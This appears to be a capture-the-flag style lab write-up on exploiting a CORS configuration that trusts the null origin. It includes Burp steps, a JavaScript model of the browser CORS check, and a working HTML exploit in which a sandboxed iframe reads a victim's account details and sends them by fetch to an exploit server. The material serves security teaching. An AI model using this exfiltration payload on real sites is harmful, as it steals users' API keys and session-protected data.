CORS vulnerability with trusted null origin

Description

This website has an insecure CORS configuration: it trusts the null origin, reflecting it in Access-Control-Allow-Origin while also allowing credentials, so a document with a null origin can read authenticated responses.

Reproduction and proof of concept

  1. Start Burp and FoxyProxy and, with intercept off, log in to the target site as wiener:peter and open the account page.

  2. In Burp, review the HTTP history. The API key is retrieved via an AJAX request to /accountDetails, and the response contains the Access-Control-Allow-Credentials header, suggesting that the endpoint supports CORS.

  3. Analysis:

  • Browsers will not expose a credentialed response when the server answers with a wildcard Access-Control-Allow-Origin: *, regardless of the Access-Control-Allow-Credentials header. Because /accountDetails needs the session cookie, a wildcard origin cannot be abused here.

  • If the server reflects Origin: null in Access-Control-Allow-Origin and also sets Access-Control-Allow-Credentials: true, a document with a null origin (for example a sandboxed iframe) can read the credentialed response.

  1. Send the request to Burp Repeater and resubmit it with the header Origin: null added. Check that null is reflected in the Access-Control-Allow-Origin header of the response, alongside Access-Control-Allow-Credentials: true.
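
As an added example (not part of the original write-up), the following JavaScript models the browser-side CORS check behind the two analysis points above and the reflection check in the Repeater step: it parses a raw response header block of the kind copied from Burp, classifies the server's policy for the Origin that was sent, and decides whether script on a given origin could read the body. The response is constructed for illustration, the API key value is a placeholder, and attacker.example is an assumed attacker origin.

```javascript
// Added example, not code from the original write-up. Models the
// browser-side CORS check and the header review done in Burp. The
// response below is constructed to look like /accountDetails answering a
// request that carried "Origin: null"; the apikey value is a placeholder.

// Parse the header block of a raw HTTP/1.1 response (as copied from Burp)
// into a lowercase-keyed object. Stops at the blank line; the body is ignored.
function parseResponseHeaders(raw) {
  const headers = {};
  const lines = raw.split(/\r?\n/);
  for (const line of lines.slice(1)) {      // skip the status line
    if (line === '') break;                 // blank line ends the headers
    const idx = line.indexOf(':');
    if (idx === -1) continue;
    headers[line.slice(0, idx).trim().toLowerCase()] = line.slice(idx + 1).trim();
  }
  return headers;
}

// Decide whether script running at `origin` (already serialized, so a
// sandboxed iframe passes the string 'null') may read a response carrying
// these headers. This follows the Fetch spec CORS check: ACAO must be '*'
// or an exact match; '*' is rejected when credentials are included; and a
// credentialed response additionally needs Access-Control-Allow-Credentials
// with the exact value 'true'.
function corsReadAllowed(origin, headers, withCredentials) {
  const acao = headers['access-control-allow-origin'];
  const acac = headers['access-control-allow-credentials'];
  if (acao === undefined) return false;
  if (acao === '*') return !withCredentials;
  if (acao !== origin) return false;        // byte-for-byte comparison, no wildcards
  if (withCredentials && acac !== 'true') return false;
  return true;
}

// Classify what the server did with the Origin we sent, the way the
// analysis above distinguishes wildcard, reflected and null origins.
function classifyCorsResponse(sentOrigin, headers) {
  const acao = headers['access-control-allow-origin'];
  const creds = headers['access-control-allow-credentials'] === 'true';
  if (acao === undefined) return 'no CORS headers';
  if (acao === '*') return creds ? 'wildcard (credentials unusable)' : 'wildcard';
  if (acao !== sentOrigin) return 'fixed allow-list, origin not trusted';
  if (!creds) return `origin reflected (${sentOrigin}) without credentials`;
  return sentOrigin === 'null'
    ? 'null origin trusted with credentials: exploitable from a sandboxed iframe'
    : `origin reflected (${sentOrigin}) with credentials: exploitable from that origin`;
}

// Constructed sample of the Repeater response after adding "Origin: null".
const sampleResponse = [
  'HTTP/1.1 200 OK',
  'Content-Type: application/json; charset=utf-8',
  'Access-Control-Allow-Origin: null',
  'Access-Control-Allow-Credentials: true',
  'Content-Length: 69',
  '',
  '{"username":"wiener","email":"","apikey":"PLACEHOLDER","sessions":[]}',
].join('\r\n');

const hdrs = parseResponseHeaders(sampleResponse);
console.log(classifyCorsResponse('null', hdrs));
// null origin trusted with credentials: exploitable from a sandboxed iframe
console.log(corsReadAllowed('null', hdrs, true));                      // true
console.log(corsReadAllowed('https://attacker.example', hdrs, true));  // false
// Wildcard with credentials: the browser refuses to expose the response.
console.log(corsReadAllowed('null', parseResponseHeaders(
  'HTTP/1.1 200 OK\r\nAccess-Control-Allow-Origin: *\r\nAccess-Control-Allow-Credentials: true\r\n\r\n'
), true));                                                              // false
```

Running it with node prints the classification and the three true/false verdicts; swapping the constructed response for one pasted from Burp is the same check done by hand in the Repeater step.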


Took a break; the lab timed out and the lab ID changed.

  1. Create the exploit (replacing lab-id and exploit-server-id). The sandboxed iframe (allow-scripts without allow-same-origin) has a null origin, so its request is sent with Origin: null.

<html>
    <body>
        <!-- sandbox without allow-same-origin gives the frame an opaque (null) origin -->
        <iframe style="display:none" sandbox="allow-scripts" srcdoc="<script>
            var req = new XMLHttpRequest();
            var url = 'https://lab-id.web-security-academy.net/';

            req.onreadystatechange = function () {
                if (req.readyState == XMLHttpRequest.DONE) {
                    // readable only because ACAO reflects null and ACAC is true;
                    // exfiltrate the JSON body to the exploit server access log
                    fetch('https://exploit-server-id/log/key=' + req.responseText)
                }
            };

            // credentialed cross-origin request: the victim session cookie is attached
            req.open('get', url + 'accountDetails',true);
            req.withCredentials = true;
            req.send(null);
        </script>"></iframe>
    </body>
</html>
  1. Go to the exploit server and enter the exploit in the body field of the form.

  2. Click View exploit, confirm that you land on the exploit server's log page, and check that the current account's API key appears in the URL.


  1. Deliver the exploit to the victim.

  2. Go to the exploit server's Access log.


  1. Copy the administrator's API key from the logged request and enter it as the solution to the lab.

Exploitability

An attacker needs to craft JavaScript that uses the trusted null origin to retrieve the administrator's API key via CORS, host it on the exploit server, and get the administrator to visit the page while logged in.